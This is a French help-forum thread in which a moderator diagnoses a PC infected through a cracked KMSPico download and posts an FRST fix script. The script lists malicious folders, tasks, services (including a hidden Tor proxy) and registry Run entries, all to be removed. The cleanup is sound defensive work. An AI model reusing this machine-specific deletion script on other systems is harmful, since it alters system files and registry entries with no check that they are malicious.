Cmd et recherche fichier
Fermé
photo24x36
-
7 mars 2018 à 12:10
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 25 mai 2018 à 18:22
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 25 mai 2018 à 18:22
A voir également:
- Cmd et recherche fichier
- Fichier rar - Guide
- Cmd - Guide
- Fichier host - Guide
- Fichier iso - Guide
- Comment réduire la taille d'un fichier - Guide
2 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 628
7 mars 2018 à 12:15
7 mars 2018 à 12:15
Bonjour,
C'est lié à un logiciel malveillant,
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
C'est lié à un logiciel malveillant,
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 628
Modifié le 25 mai 2018 à 18:25
Modifié le 25 mai 2018 à 18:25
Tu as complètement pourri l'ordinateur en téléchargeant un KMSPico vérolé.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
Enregistre le contenu par le menu fichier puis enregistrer.
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.
CreateRestorePoint:
CloseProcesses:
2018-05-25 12:00 - 2018-05-25 12:00 - 000000000 ____D C:\Users\Victor\AppData\Roaming\ouwintaxqlv
2018-05-25 12:00 - 2018-05-25 12:00 - 000000000 ____D C:\Users\Victor\AppData\Roaming\3ipzotsasey
2018-05-25 12:00 - 2018-05-25 12:00 - 000000000 ____D C:\Program Files\D3EIKIU11F
2018-05-25 12:00 - 2018-05-25 12:00 - 000000000 ____D C:\Program Files\AD92IJ4LPY
2018-05-25 11:57 - 2018-05-25 11:58 - 002413056 _____ (Farbar) C:\Users\Victor\Downloads\FRST64 (1).exe
2018-05-25 11:45 - 2018-05-25 11:45 - 000000000 ____D C:\Users\Victor\AppData\Roaming\uxvhvioxtov
2018-05-25 11:45 - 2018-05-25 11:45 - 000000000 ____D C:\Users\Victor\AppData\Roaming\qzk4tkbawhm
2018-05-25 11:45 - 2018-05-25 11:45 - 000000000 ____D C:\Program Files\IBPB36KIC6
2018-05-25 11:45 - 2018-05-25 11:45 - 000000000 ____D C:\Program Files\BY4CSEYHZX
2018-05-25 11:44 - 2018-05-25 11:44 - 000000364 _____ C:\Users\Victor\Documents\powershell_ise.exe.config.txt
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Users\Victor\AppData\Roaming\u142ucfexs4
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Users\Victor\AppData\Roaming\nv0ut0zvgjy
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Users\Victor\AppData\Roaming\ihfbsemno42
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Users\Victor\AppData\Roaming\gboop5p5rtx
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Program Files\N2JG597NW8
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Program Files\L6RE1PUZ99
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Program Files\EXNDFSC5P0
2018-05-25 11:00 - 2018-05-25 11:00 - 000000000 ____D C:\Program Files\DZK5I8ILM4
2018-05-25 10:46 - 2018-05-25 10:47 - 000000000 ____D C:\Program Files\X2CK10ANY9
2018-05-25 10:46 - 2018-05-25 10:47 - 000000000 ____D C:\Program Files\NP80RGZ7K5
2018-05-25 10:46 - 2018-05-25 10:47 - 000000000 ____D C:\Program Files\JJGZB5D6C4
2018-05-25 10:46 - 2018-05-25 10:47 - 000000000 ____D C:\Program Files\B94IYUWEG4
2018-05-25 10:46 - 2018-05-25 10:46 - 000003322 _____ C:\Windows\System32\Tasks\psv_Zoobam
2018-05-25 10:46 - 2018-05-25 10:46 - 000000000 ____D C:\Users\Victor\AppData\Roaming\w2lhuqiaxyr
2018-05-25 10:46 - 2018-05-25 10:46 - 000000000 ____D C:\Users\Victor\AppData\Roaming\il2zw31b4ae
2018-05-25 10:46 - 2018-05-25 10:46 - 000000000 ____D C:\Users\Victor\AppData\Roaming\bg0b4gzq2ry
2018-05-25 10:46 - 2018-05-25 10:46 - 000000000 ____D C:\Users\Victor\AppData\Roaming\3wg1dnfxvo4
2018-05-25 10:44 - 2018-05-25 10:44 - 000000000 ____D C:\Users\Victor\AppData\Roaming\jhdgvxoh4do
2018-05-25 10:44 - 2018-05-25 10:44 - 000000000 ____D C:\Users\Victor\AppData\Roaming\e0mwcaidbyu
2018-05-25 10:44 - 2018-05-25 10:44 - 000000000 ____D C:\Program Files\PZNFNAPN08
2018-05-25 10:44 - 2018-05-25 10:44 - 000000000 ____D C:\Program Files\6NA2MW1WSV
2018-05-25 10:34 - 2018-05-25 10:34 - 000000000 __SHD C:\OSRSS
2018-05-25 10:34 - 2018-05-25 10:34 - 000000000 ___HD C:\$WINDOWS.~BT
2018-05-25 10:30 - 2018-05-25 10:30 - 000003290 _____ C:\Windows\System32\Tasks\smadav
2018-05-25 10:30 - 2018-05-25 10:30 - 000001153 _____ C:\Users\Public\Desktop\SMADΔV.lnk
2018-05-25 10:30 - 2018-05-25 10:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SMADAV Antivirus
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Users\Victor\AppData\Roaming\rqugweokxa3
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Users\Victor\AppData\Roaming\gac2zoudlaa
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Users\Victor\AppData\Roaming\eacd23u4inf
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Users\Victor\AppData\Roaming\35k0q2w1zco
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Program Files\WJC9AXHZKK
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Program Files\ORJSPZIC52
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Program Files\M726Z8D4V6
2018-05-25 09:59 - 2018-05-25 09:59 - 000000000 ____D C:\Program Files\1N2MH5FTLX
2018-05-25 09:58 - 2018-05-25 09:58 - 000003314 _____ C:\Windows\System32\Tasks\psv_Tranla
2018-05-25 01:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\KC1VRGDOA6
2018-05-25 01:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\FMUUNG5CUH
2018-05-25 01:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\CXKVKCMH7Q
2018-05-25 01:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\3DLUKT6SAJ
2018-05-25 01:29 - 2018-05-25 01:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\jnyf1t1ctvy
2018-05-25 01:29 - 2018-05-25 01:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\e3scecsoyqw
2018-05-25 01:29 - 2018-05-25 01:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\0vzjy3fidse
2018-05-25 01:29 - 2018-05-25 01:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\0guckojuskg
2018-05-25 01:20 - 2018-05-25 01:31 - 000003872 _____ C:\Windows\System32\Tasks\MainPM
2018-05-25 01:20 - 2018-05-25 01:20 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-25 01:18 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\YCYRV93DMK
2018-05-25 01:18 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\QCV1J4MHT7
2018-05-25 01:18 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\CIAZVFWGBF
2018-05-25 01:18 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\4Z5OONL2W0
2018-05-25 01:18 - 2018-05-25 01:18 - 000000000 ____D C:\Users\Victor\AppData\Roaming\zkhlojqwoda
2018-05-25 01:18 - 2018-05-25 01:18 - 000000000 ____D C:\Users\Victor\AppData\Roaming\jsavrzk3bsm
2018-05-25 01:18 - 2018-05-25 01:18 - 000000000 ____D C:\Users\Victor\AppData\Roaming\js4zfdt00qe
2018-05-25 01:18 - 2018-05-25 01:18 - 000000000 ____D C:\Users\Victor\AppData\Roaming\efb5shlrkle
2018-05-25 01:14 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\WFVSNTH8GB
2018-05-25 01:14 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\7ETGO8YZVE
2018-05-25 01:14 - 2018-05-25 01:14 - 000000000 ____D C:\Users\Victor\AppData\Roaming\corp3s5l1qo
2018-05-25 01:14 - 2018-05-25 01:14 - 000000000 ____D C:\Users\Victor\AppData\Roaming\3urbznwhymp
2018-05-25 00:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\YG82WF5H32
2018-05-25 00:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\V0OLFMW2PK
2018-05-25 00:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\I2QOKCGMHF
2018-05-25 00:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\74GMUEQFHI
2018-05-25 00:29 - 2018-05-25 00:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\oy1vqm3som1
2018-05-25 00:29 - 2018-05-25 00:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\dzov21dufsp
2018-05-25 00:29 - 2018-05-25 00:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\3yf2vlkoyjt
2018-05-25 00:29 - 2018-05-25 00:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\0421f4smytd
2018-05-25 00:16 - 2018-05-25 10:05 - 000004180 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{2B69DD6C-BA72-454D-B4BB-AC3EEB60D0B9}
2018-05-24 23:44 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\OQ4R437TBZ
2018-05-24 23:44 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\7WQZNNBG9E
2018-05-24 23:44 - 2018-05-24 23:44 - 000000000 ____D C:\Users\Victor\AppData\Roaming\vddg10dmcvo
2018-05-24 23:44 - 2018-05-24 23:44 - 000000000 ____D C:\Users\Victor\AppData\Roaming\13wxqmb5pey
2018-05-24 23:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\F5JCHMAI8E
2018-05-24 23:29 - 2018-05-25 01:40 - 000000000 ____D C:\Program Files\7JMKI78OGV
2018-05-24 23:29 - 2018-05-24 23:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\xixv3jbtjdo
2018-05-24 23:29 - 2018-05-24 23:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\ubsgmp2aohg
2018-05-24 22:59 - 2018-05-24 22:59 - 000000000 ____D C:\Users\Victor\AppData\Roaming\oxp01jkwowa
2018-05-24 22:59 - 2018-05-24 22:59 - 000000000 ____D C:\Users\Victor\AppData\Roaming\m3lcetr0sj0
2018-05-24 22:59 - 2018-05-24 22:59 - 000000000 ____D C:\Program Files\9QB3FGFMN6
2018-05-24 22:59 - 2018-05-24 22:59 - 000000000 ____D C:\Program Files\6RF5Q5FR1H
2018-05-24 22:29 - 2018-05-24 22:31 - 000000000 ____D C:\Program Files\VJGXSGDJYQ
2018-05-24 22:29 - 2018-05-24 22:31 - 000000000 ____D C:\Program Files\LS5G9R6DLJ
2018-05-24 19:29 - 2018-05-24 19:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\WidModule
2018-05-24 19:27 - 2018-05-25 12:00 - 000929792 _____ C:\Users\Victor\AppData\Local\sham.db
2018-05-24 19:27 - 2018-05-24 19:27 - 000140800 _____ C:\Users\Victor\AppData\Local\installer.dat
2018-05-24 19:27 - 2018-05-24 19:27 - 000011568 _____ C:\Users\Victor\AppData\Local\InstallationConfiguration.xml
2018-05-24 19:27 - 2018-05-24 19:27 - 000000000 ____D C:\Users\Victor\AppData\Roaming\p4sijpmuodm
2018-05-24 19:27 - 2018-05-24 19:27 - 000000000 ____D C:\Users\Victor\AppData\Roaming\0uakw0cf3pf
2018-05-24 19:27 - 2018-05-24 19:27 - 000000000 ____D C:\Users\Victor\AppData\Local\XService
2018-05-24 19:26 - 2018-05-24 19:26 - 000000000 ____D C:\Users\Victor\AppData\Roaming\gqfxd03jcq0
2018-05-24 19:26 - 2018-05-24 19:26 - 000000000 ____D C:\Users\Victor\AppData\Roaming\afv04nvdwqh
2018-05-24 12:42 - 2018-05-24 12:42 - 000000000 ____D C:\Users\Victor\AppData\Roaming\EpicNet Inc
2018-05-24 22:29 - 2018-05-24 22:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\53wapvrjooe
2018-05-24 22:29 - 2018-05-24 22:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\4eveemtsxnx
2018-05-24 22:29 - 2018-05-24 22:29 - 000000000 ____D C:\Users\Victor\AppData\Local\NetworkTiles
2018-05-24 22:14 - 2018-05-25 01:01 - 000000000 ____D C:\Program Files\WKZPVTHZ0G
2018-05-24 22:14 - 2018-05-25 01:01 - 000000000 ____D C:\Program Files\OVLBC00BF7
2018-05-24 22:14 - 2018-05-24 22:14 - 000001111 _____ C:\Users\Public\Desktop\FAssistant.lnk
2018-05-24 22:14 - 2018-05-24 22:14 - 000000000 ____D C:\Users\Victor\AppData\Roaming\e2hdwccpxrw
2018-05-24 22:14 - 2018-05-24 22:14 - 000000000 ____D C:\Users\Victor\AppData\Roaming\0xzhiauuzmq
2018-05-24 22:14 - 2018-05-24 22:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FAssistant
2018-05-24 22:14 - 2018-05-24 22:14 - 000000000 ____D C:\Program Files (x86)\FAssistant
2018-05-24 21:29 - 2018-05-25 01:01 - 000000000 ____D C:\Program Files\YII64NTM1Y
2018-05-23 10:40 - 2018-05-25 11:06 - 000003274 _____ C:\Windows\System32\Tasks\csrss
2018-05-23 10:40 - 2018-05-24 19:53 - 003451904 ____H C:\Windows\windefender.exe
2018-05-23 05:30 - 2018-05-23 05:30 - 000000000 ___HD C:\$SysReset
2018-05-22 21:36 - 2018-05-22 21:36 - 000003326 _____ C:\Windows\System32\Tasks\psv_Fixhome
2018-05-22 21:21 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\EIL2L24241
2018-05-22 21:21 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\0ARSF3Y5D2
2018-05-22 21:20 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\Q186X2LQ1S
2018-05-22 21:20 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\M3RX5FGI92
2018-05-22 21:20 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\LWEXK865QV
2018-05-22 21:20 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\K7ZV2U2UN3
2018-05-22 21:19 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\9SY6ENC1XZ
2018-05-22 21:19 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\UEEGVE3Z17
2018-05-22 21:16 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\EGMIKRYMOA
2018-05-22 21:16 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\8YGG154DOE
2018-05-22 21:13 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\BHMM9A92XD
2018-05-22 21:13 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\UF8FTP6D0C
2018-05-22 21:08 - 2018-05-22 21:08 - 000000000 ___HD C:\Windows\rss
2018-05-22 21:02 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\G40FDZ7DSZ
2018-05-22 21:02 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\C67SWTROFD
2018-05-22 20:46 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\5Q7VFGVF59
2018-05-22 20:45 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\E2E8KCRAT2
2018-05-22 20:45 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\MXTOXTPYBF
2018-05-22 20:33 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\Y3DR89XNKF
2018-05-22 20:33 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\MX6NQCKAZ8
2018-05-22 20:32 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\HDN37MQY89
2018-05-22 20:32 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\VLM51X5FPZ
2018-05-22 20:31 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\4A4RBKX3ZK
2018-05-22 20:19 - 2018-05-23 13:36 - 000000000 ____D C:\Program Files\Windows KMS Activator Ultimate 2018 4.0
2018-05-22 20:13 - 2018-05-25 10:59 - 000000000 ____D C:\ProgramData\TorchCrashHandler
2018-05-22 20:08 - 2018-05-24 11:46 - 000000000 ____D C:\Users\serigne victor\AppData\Local\Torch
2018-05-22 19:47 - 2018-05-22 19:47 - 000003330 _____ C:\Windows\System32\Tasks\psv_UnoNimtop
2018-05-22 19:46 - 2018-05-23 23:42 - 000000000 ____D C:\Program Files\9PBQSOUEBP
2018-05-22 19:30 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\OUP2NTPWY3
2018-05-22 19:25 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\9HBN36AJIJ
2018-05-22 19:25 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\3ZETMSZ3FX
2018-05-22 19:23 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\IM0X9MBL74
2018-05-22 19:23 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\32OFC17T1O
2018-05-22 19:23 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\11FLUO2NC0
2018-05-22 19:23 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\TOWYR20T9V
2018-05-22 19:13 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\4DZARH7160
2018-05-22 19:13 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\MH0NU53B8R
2018-05-22 19:11 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\41A5ZJ6JO3
2018-05-22 19:11 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\MB77OPZMDU
2018-05-22 19:01 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\GXHF2TYUUN
2018-05-22 19:01 - 2018-05-23 20:14 - 000000000 ____D C:\Program Files\X6611KRZ7N
2018-05-22 18:56 - 2018-05-24 20:36 - 000003676 _____ C:\Windows\System32\Tasks\FastDataX Task
2018-05-22 18:54 - 2018-05-24 20:35 - 000000000 ____D C:\Program Files (x86)\FastDataX
2018-05-22 18:49 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\GZLWOZKLWL
2018-05-22 18:49 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\CM2QRVEIEM
2018-05-22 18:49 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\BFDIMPN1Z5
2018-05-22 18:47 - 2018-05-23 23:42 - 000000000 ____D C:\Program Files (x86)\ShutdownTime
2018-05-22 18:45 - 2018-05-23 20:15 - 000000000 ____D C:\Program Files\2KHLDPWQ55
2018-05-22 18:45 - 2018-05-22 18:45 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-22 18:44 - 2018-05-24 02:02 - 000000000 ____D C:\Program Files (x86)\Multitimer
2018-05-22 18:44 - 2018-05-22 20:32 - 000000000 ____D C:\Program Files (x86)\Lberah
2018-05-22 18:44 - 2018-05-22 18:44 - 000000000 ____D C:\ProgramData\yahoochrome_D
2018-05-22 18:44 - 2018-05-22 18:44 - 000000000 ____D C:\Program Files (x86)\PandaViewer
2018-05-22 18:43 - 2018-05-24 19:29 - 000015587 _____ C:\Windows\SysWOW64\findit.xml
2018-05-22 18:43 - 2018-05-22 18:43 - 000000000 ____D C:\ProgramData\Quoteexs
2018-05-22 18:43 - 2018-05-22 18:43 - 000000000 ____D C:\Program Files (x86)\Microleaves
2018-05-22 18:42 - 2018-05-25 11:59 - 000000000 ____D C:\ProgramData\Quoteex
2018-05-22 18:42 - 2018-05-22 18:42 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-22 18:37 - 2018-05-22 19:29 - 000000000 ____D C:\Program Files (x86)\foldershare
2018-05-22 18:37 - 2018-05-22 18:37 - 000000000 ____D C:\Users\serigne victor\AppData\Local\XService
2018-05-22 18:36 - 2018-05-22 18:36 - 000000000 ____D C:\Program Files (x86)\KMSPico 10.2.1 Final
2018-05-24 21:29 - 2018-05-25 01:01 - 000000000 ____D C:\Program Files\DGT4T1LRYX
2018-05-24 21:29 - 2018-05-25 01:01 - 000000000 ____D C:\Program Files\7IZV7B3UHD
2018-05-24 21:29 - 2018-05-25 01:01 - 000000000 ____D C:\Program Files\0VNDA87DVU
2018-05-24 21:29 - 2018-05-24 21:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\t0sshqy4qsw
2018-05-24 21:29 - 2018-05-24 21:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\llc0sz0gade
2018-05-24 21:29 - 2018-05-24 21:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\kcqyd1so4me
2018-05-24 21:29 - 2018-05-24 21:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\0ninoxsabfh
2018-05-24 20:44 - 2018-05-24 20:44 - 000000000 ____D C:\Users\Victor\AppData\Roaming\vvrdo3glz0a
2018-05-24 20:44 - 2018-05-24 20:44 - 000000000 ____D C:\Users\Victor\AppData\Roaming\tcuvexqbheu
2018-05-24 20:44 - 2018-05-24 20:44 - 000000000 ____D C:\Program Files\5N15J5Q8L8
2018-05-24 20:44 - 2018-05-24 20:44 - 000000000 ____D C:\Program Files\1NI06TZSUR
2018-05-24 20:31 - 2018-05-24 20:31 - 000000000 ____D C:\Users\Victor\AppData\Roaming\FastDataX
2018-05-24 20:30 - 2018-05-24 20:30 - 000000000 ____D C:\Users\Victor\AppData\Roaming\SystemHealer
2018-05-24 20:29 - 2018-05-24 20:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\jq45npja2zp
2018-05-24 20:29 - 2018-05-24 20:29 - 000000000 ____D C:\Users\Victor\AppData\Roaming\epvexag5phl
2018-05-24 20:29 - 2018-05-24 20:29 - 000000000 ____D C:\Program Files\ZRU08YWYGJ
2018-05-24 20:29 - 2018-05-24 20:29 - 000000000 ____D C:\Program Files\I5PEE4XIS0
S1 prifass; C:\Windows\System32\drivers\prifass.sys [115776 2018-05-11] ()
R2 wust; C:\OSRSS\wust.exe [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)
R2 TCPSvc; "C:\Users\serigne victor\AppData\Local\Temp\csrss\proxy\Tor\tor.exe" --nt-service --SocksPort 7050 --Log "notice file C:\Users\serigne victor\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-22] () [Fichier non signé] <==== ATTENTION
R2 MicroService; C:\Users\serigne victor\AppData\Local\XService\XService.dll [585216 2018-05-22] () [Fichier non signé]
R2 osrss; C:\Windows\system32\osrss.dll [108584 2018-01-18] (Microsoft Corporation)
R2 Quoteex; C:\ProgramData\\Quoteex\\Quoteex.exe [2136576 2018-05-22] (TODO: <Company name>) [Fichier non signé] <==== ATTENTION
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop225.exe [517432 2018-05-21] (PandaViewer)
R2 TorchCrashHandler; C:\Users\serigne victor\AppData\Local\Torch\Update\TorchCrashHandler.exe [1216520 2014-06-02] (TorchMedia Inc.) <==== ATTENTION
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [190 2018-05-10] ()
HKLM-x32\...\Run: [ShutdownTime] => C:\Program Files (x86)\ShutdownTime\ShutdownTime.exe [91648 2017-06-14] ()
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Realtek\6WASPDRN5386N8\LSHP5ikB+k.exe [312320 2018-05-22] ()
HKLM\...\RunOnce: [c5exahm12fp] => C:\Program Files (x86)\Lberah\4534907.exe [670208 2018-05-22] ()
HKLM\...\RunOnce: [i5q1anhgrwy] => C:\Program Files (x86)\Lberah\6791811.exe [670208 2018-05-22] ()
HKLM\...\RunOnce: [gjtnfgygy2l] => C:\Program Files (x86)\Lberah\5846997.exe [670208 2018-05-22] ()
HKLM\...\RunOnce: [y10denffmox] => C:\Program Files (x86)\Lberah\1344965.exe [670208 2018-05-22] ()
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [CloudNet] => C:\Users\Victor\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-25] (EpicNet Inc.)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [BoldSnow] => C:\Windows\rss\csrss.exe [3172864 2018-05-22] () <==== ATTENTION
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [K5ZVSZDBHDVDMNZ] => C:\Program Files\ZRU08YWYGJ\ZRU08YWYG.exe [666624 2018-05-24] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [BH3IBFP5XHL5ZDM] => C:\Program Files\I5PEE4XIS0\I5PEE4XIS.exe [666624 2018-05-24] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [U5ZOE05AUTVZ76S] => C:\Program Files\5N15J5Q8L8\5N15J5Q8L.exe [666624 2018-05-24] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [GLHH24X4542M3WE] => C:\Program Files\1NI06TZSUR\1NI06TZSU.exe [666624 2018-05-24] ()
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [WVXFK8E4LKBNI2Z] => C:\Program Files\LS5G9R6DLJ\LS5G9R6DL.exe [666624 2018-05-24] (UCC9FMN3Q)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [U4PODNPU1QNQ461] => C:\Program Files\VJGXSGDJYQ\2M4JSJ92S.exe [666624 2018-05-24] (UCC9FMN3Q)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [LPENMHE4DT2BMJF] => C:\Program Files\6RF5Q5FR1H\KYSDQC8VP.exe [666624 2018-05-24] (UCC9FMN3Q)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [EZ2H08Q0VH9K1H3] => C:\Program Files\9QB3FGFMN6\0MURNMDRA.exe [666624 2018-05-24] (UCC9FMN3Q)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [JDKNILLL21EOVG5] => C:\Program Files\1N2MH5FTLX\8QQ8H8BDF.exe [667136 2018-05-25] (X@21O22)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [9UOYQ7P2EYY4XR5] => C:\Program Files\WJC9AXHZKK\WJC9AXHZK.exe [667136 2018-05-25] (X@21O22)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [C6B3RZQ06RFISP8] => C:\Program Files\M726Z8D4V6\TBQSZC9OP.exe [667136 2018-05-25] (X@21O22)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [YF1RXAYR73R0Y6T] => C:\Program Files\ORJSPZIC52\ORJSPZIC5.exe [667136 2018-05-25] (X@21O22)
HKU\S-1-5-21-3737552420-2105503091-1117032357-1005\...\Run: [03RMJHGSNPP4NJQ] => C:\Program Files\PZNFNAPN08\PZNFNAPN0.exe [666624 2018-05-25] ()
